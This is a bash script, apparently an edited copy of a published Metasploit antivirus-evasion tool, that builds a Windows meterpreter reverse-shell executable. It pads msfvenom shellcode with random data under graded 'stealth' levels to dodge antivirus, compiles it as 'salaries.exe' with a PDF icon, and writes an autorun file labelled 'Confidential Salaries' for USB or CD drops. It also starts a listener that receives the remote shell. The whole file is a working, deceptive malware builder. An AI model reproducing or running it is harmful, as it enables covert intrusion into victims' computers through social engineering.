AVoid-Edited-By-CybaFrE3z

1. #!/usr/bin/env bash
2. #
3. #  CybaFrE3z
4. #    Tried to edit it to use msfvenom
5. #
6. # AV0id - Metapsloit Payload Anti-Virus Avasion
7. # Daniel Compton
8. # www.commonexploits.com
9. # info@commexploits.com
10. # Twitter = @commonexploits
11. # 05/2013
12. # Tested on Bactrack 5 and Kali only.
13.  
14. #####################################################################################
15. # Released as open source by NCC Group Plc - http://www.nccgroup.com/
16.  
17. # Developed by Daniel Compton, daniel dot compton at nccgroup dot com
18.  
19. # https://github.com/nccgroup/metasploitavevasion
20.  
21. #Released under AGPL see LICENSE for more information
22.  
23. ######################################################################################
24.  
25. # Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k
26.  
27. # User options
28. OUTPUTNAME="salaries.exe" # The payload exe created name
29. PAYLOAD="windows/meterpreter/reverse_tcp" # The payload to use
30. MSFPAYLOAD=`which msfpayload` # Path to the msfpayload script
31. MSFENCODE=`which msfencode` # Path to the msfencode script
32. MSFCLI=`which msfcli` # Path to the msfcli script
33. MSFVENOM=`which msfvenom` # Path to msfvenom
34.  
35. # Script begins
36. #===============================================================================
37.  
38. VERSION="1.5"
39.  
40. # spinner for Metasploit Generator
41. spinlong ()
42. {
43.     bar=" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
44.     barlength=${#bar}
45.     i=0
46.     while ((i < 100)); do
47.         n=$((i*barlength / 100))
48.         printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
49.         ((i += RANDOM%5+2))
50.         sleep 0.02
51.     done
52. }
53.  
54.  
55. # spinner for random seed generator
56. spinlong2 ()
57. {
58.     bar=" 011001110010010011101110011010101010101101010010101110"
59.     barlength=${#bar}
60.     i=0
61.     while ((i < 100)); do
62.         n=$((i*barlength / 100))
63.         printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
64.         ((i += RANDOM%5+2))
65.         sleep 0.02
66.     done
67. }
68.  
69. clear
70. echo ""
71. echo -e "\e[00;32m##################################################################\e[00m"
72. echo ""
73. echo -e "*** \e[01;31mAV\e[00m\e[01;32m0id\e[00m - Metasploit Shell A.V. Avoider Version $VERSION  ***"
74. echo ""
75. echo -e "\e[00;32m##################################################################\e[00m"
76. echo ""
77. sleep 3
78. clear
79.  
80. #Check for gcc compiler
81. which i586-mingw32msvc-gcc >/dev/null 2>&1
82. if [ $? -eq 0 ]; then
83.     echo ""
84. else
85.     echo ""
86.     echo -e "\e[01;31m[!]\e[00m Unable to find the required gcc program, install i586-mingw32msvc-gcc and try again"
87.     echo ""
88.     exit 1
89. fi
90.  
91. #Check for Metasploit
92. if [[ "$MSFPAYLOAD" != "" || "$MSFENCODE" != "" || "$MSFCLI" != "" ]]; then
93.     echo ""
94. else
95.     echo ""
96.     echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again"
97.     echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options"
98.     echo ""
99.     exit 1
100. fi
101.  
102.  
103. # create a PDF icon
104.  
105. #Check for PDF icon files
106.  
107. ls icons/icon.res >/dev/null 2>&1 && ls icons/autorun.ico >/dev/null 2>&1
108. if [ $? -eq 0 ]; then
109.     echo ""
110. else
111.     echo ""
112.     echo -e "\e[01;31m[!]\e[00m I can't find the icon files I will need, I will try and download these now"
113.     echo ""
114.     sleep 2
115.     echo ""
116.     echo -e "\e[01;32m[-]\e[00m Attempting to download 2 files...please wait"
117.     echo ""
118.     mkdir icons >/dev/null 2>&1
119.     cd icons >/dev/null 2>&1
120.     wget http://www.commonexploits.com/tools/avoid/icon.res >/dev/null 2>&1
121.     wget http://www.commonexploits.com/tools/avoid/autorun.ico >/dev/null 2>&1
122.     sleep 2
123.     ls icon.res >/dev/null 2>&1 && ls autorun.ico >/dev/null 2>&1
124.     if [ $? -eq 0 ]; then
125.         echo -e "\e[01;32m[+]\e[00m Success, icon files downloaded"
126.         cd ..
127.         echo ""
128.     else
129.         echo -e "\e[01;31m[!]\e[00m Unable to download the icon files, script will continue but you will not have the masked PDF exe or autorun icon"
130.         cd ..
131.         echo ""
132.     fi
133. fi
134.  
135. # Random Msfencode encoding iterations
136. #ITER=`seq 5 10 |sort -R |sort -R | head -1`
137. ITER=`shuf -i 10-20 -n 1`
138.  
139. echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
140. echo -e "\e[01;31m[?]\e[00m What system do you want the Metasploit listenter to run on? Enter 1 or 2 and press enter"
141. echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
142. echo ""
143. echo " 1. Use my current system and IP address"
144. echo ""
145. echo " 2. Use an alternative system, i.e public external address"
146. echo ""
147. echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
148. echo ""
149. echo -ne "\e[01;32m>\e[00m "
150. read INTEXT
151. echo ""
152. if [ "$INTEXT" = "1" ]; then
153.     echo ""
154.     IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
155.     IP=$(ifconfig "$IPINT" |egrep "inet add?r:" |cut -d ":" -f 2 |awk '{ print $1 }')
156.     echo -e "\e[01;32m[-]\e[00m Local system selected, listener will be launched on \e[01;32m$IP\e[00m using interface \e[01;32m$IPINT\e[00m"
157.     echo ""
158.     echo -e "\e[1;31m-------------------------------------------------------\e[00m"
159.     echo -e "\e[01;31m[?]\e[00m What port number do you want to listen on?"
160.     echo -e "\e[1;31m-------------------------------------------------------\e[00m"
161.     echo ""
162.     echo -ne "\e[01;32m>\e[00m "
163.     read PORT
164.     echo ""
165. elif [ "$INTEXT" = "2" ]; then
166.     echo ""
167.     echo -e "\e[01;32m[-]\e[00m Alternative system selected"
168.     echo ""
169.     echo -e "\e[1;31m--------------------------------------------------------------------\e[00m"
170.     echo -e "\e[01;31m[?]\e[00m What IP address to you want the listener to run on?"
171.     echo -e "\e[1;31m--------------------------------------------------------------------\e[00m"
172.     echo ""
173.     echo -ne "\e[01;32m>\e[00m "
174.     read IP
175.     echo ""
176.     echo ""
177.     echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
178.     echo -e "\e[01;31m[?]\e[00m What port number do you want to listen on? If on the internet try port 53 if restricted"
179.     echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
180.     echo ""
181.     echo -ne "\e[01;32m>\e[00m "
182.     read PORT
183.     echo ""
184. else
185.     echo -e "\e[01;31m[!]\e[00m You didnt select a valid option, try again"
186.     echo ""
187.     exit 1
188. fi
189. echo ""
190. echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..."
191. echo ""
192. spinlong
193. #Payload creater
194. $MSFVENOM -p $PAYLOAD LHOST=$IP LPORT=$PORT EXITFUNC=thread -b \x00 -f c > msf.c 2>/dev/null
195. #$MSFPAYLOAD "$PAYLOAD" LHOST="$IP" LPORT="$PORT" EXITFUNC=thread R | $MSFENCODE -e x86/shikata_ga_nai -c $ITER -t raw 2>/dev/null | $MSFENCODE -e x86/jmp_call_additive -c $ITER -t raw 2>/dev/null | $MSFENCODE -e x86/call4_dword_xor -c $ITER -t raw 2>/dev/null |  $MSFENCODE -e x86/shikata_ga_nai -c $ITER -t c > msf.c 2>/dev/null
196. echo ""
197. echo ""
198. # Menu
199. echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
200. echo -e "\e[01;31m[?]\e[00m How stealthy do you want the file? Enter 1, 2, 3, 4 or 5 and press enter"
201. echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
202. echo ""
203. echo " 1. Normal - about 400K payoad  - fast compile - 13/46 A.V. products detected as malicious"
204. echo ""
205. echo " 2. Stealth - about 1-2 MB payload - fast compile - 12/46 A.V. products detected as malicious"
206. echo ""
207. echo " 3. Super Stealth - about 10-20MB payload - fast compile - 11/46 A.V. detected as malicious"
208. echo ""
209. echo " 4. Insane Stealth - about 50MB payload - slower compile - 10/46 A.V. detected as malicious"
210. echo ""
211. echo " 5. Desperate Stealth - about 100MB payload - slower compile - Not tested with A.V."
212. echo ""
213. echo -e "\e[1;31m----------------------------------------------------------------------------------------------\e[00m"
214. echo ""
215. echo -ne "\e[01;32m>\e[00m "
216. read LEVEL
217. echo ""
218. if [ "$LEVEL" = "1" ]; then
219.     echo ""
220.     echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds"
221.     echo ""
222.     echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
223.     echo ""
224.     spinlong2
225.     SEED=$(shuf -i 100000-500000 -n 1)
226. elif [ "$LEVEL" = "2" ]; then
227.     echo ""
228.     echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds"
229.     echo ""
230.     echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
231.     echo ""
232.     spinlong2
233.     SEED=$(shuf -i 1000000-5000000 -n 1)
234. elif [ "$LEVEL" = "3" ]; then
235.     echo ""
236.     echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds"
237.     echo ""
238.     echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
239.     echo ""
240.     spinlong2
241.     SEED=$(shuf -i 8000000-12000000 -n 1)
242. elif [ "$LEVEL" = "4" ]; then
243.     echo ""
244.     echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes"
245.     echo ""
246.     echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
247.     echo ""
248.     spinlong2
249.     SEED=$(shuf -i 40000000-60000000 -n 1)
250. elif [ "$LEVEL" = "5" ]; then
251.     echo ""
252.     echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes"
253.     echo ""
254.     echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
255.     echo ""
256.     spinlong2
257.     SEED=$(shuf -i 100000000-200000000 -n 1)
258. else
259.     echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting"
260.     echo ""
261.     exit 1
262. fi
263.  
264. # build the c file ready for compile
265. echo ""
266. echo '#include <stdio.h>' >> build.c
267. echo 'unsigned char padding[]=' >> build.c
268. cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > random
269. sed -i 's/$/"/' random
270. sed -i 's/^/"/' random
271. cat random >> build.c
272. echo  ';' >> build.c
273. echo 'char payload[] =' >> build.c
274. cat msf.c |grep -v "unsigned" >> build.c
275. echo 'char comment[512] = "";' >> build.c
276. echo 'int main(int argc, char **argv) {' >> build.c
277. echo  ' (*(void (*)()) payload)();' >> build.c
278. echo '  return(0);' >> build.c
279. echo '}' >> build.c
280.  
281. # gcc compile the exploit
282.  
283. ls icons/icon.res >/dev/null 2>&1
284. if [ $? -eq 0 ]; then
285.     i586-mingw32msvc-gcc -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME"
286. else
287.     i586-mingw32msvc-gcc -Wall -mwindows build.c -o "$OUTPUTNAME"
288. fi
289.  
290. # check if file built correctly
291. LOCATED=`pwd`
292. ls "$OUTPUTNAME" >/dev/null 2>&1
293. if [ $? -eq 0 ]; then
294.     echo ""
295.     echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m"
296. else
297.     echo ""
298.     echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting"
299.     echo ""
300.     exit 1
301. fi
302.  
303. # create autorun files
304. mkdir autorun >/dev/null 2>&1
305. cp "$OUTPUTNAME" autorun/ >/dev/null 2>&1
306. cp icons/autorun.ico autorun/ >/dev/null 2>&1
307. echo "[autorun]" > autorun/autorun.inf
308. echo "open="$OUTPUTNAME"" >> autorun/autorun.inf
309. echo "icon=autorun.ico" >> autorun/autorun.inf
310. echo "label=Confidential Salaries" >> autorun/autorun.inf
311. echo ""
312. echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB"
313.  
314. # clean up temp files
315. rm build.c >/dev/null 2>&1
316. rm random >/dev/null 2>&1
317. rm msf.c >/dev/null 2>&1
318.  
319.  
320. echo ""
321. sleep 2
322. echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
323. echo -e "\e[01;31m[?]\e[00m Do you want the listener to be loaded automatically? Enter 1 or 2 and press enter"
324. echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
325. echo ""
326. echo " 1. Yes"
327. echo ""
328. echo " 2. No"
329. echo ""
330. echo -e "\e[1;31m----------------------------------------------------------------------------------------------\e[00m"
331. echo ""
332. echo -ne "\e[01;32m>\e[00m "
333. read INTEXT
334. echo ""
335. if [ "$INTEXT" = "1" ]; then
336.     echo -e "\e[01;32m[-]\e[00m Loading the Metasploit listener on \e[01;32m$IP:$PORT\e[00m, please wait..."
337.     echo ""
338.     $MSFCLI exploit/multi/handler PAYLOAD="$PAYLOAD" LHOST="$IP" LPORT="$PORT" E 2>/dev/null
339. else
340.     echo ""
341.     echo -e "\e[01;32m[-]\e[00m Run the following code on your listener system:"
342.     echo ""
343.     echo -e "\e[01;32m+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\e[00m"
344.     echo ""
345.     echo "$MSFCLI exploit/multi/handler PAYLOAD="$PAYLOAD" LHOST="$IP" LPORT="$PORT" E"
346.     echo ""
347.     echo -e "\e[01;32m+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\e[00m"
348.     echo ""
349. fi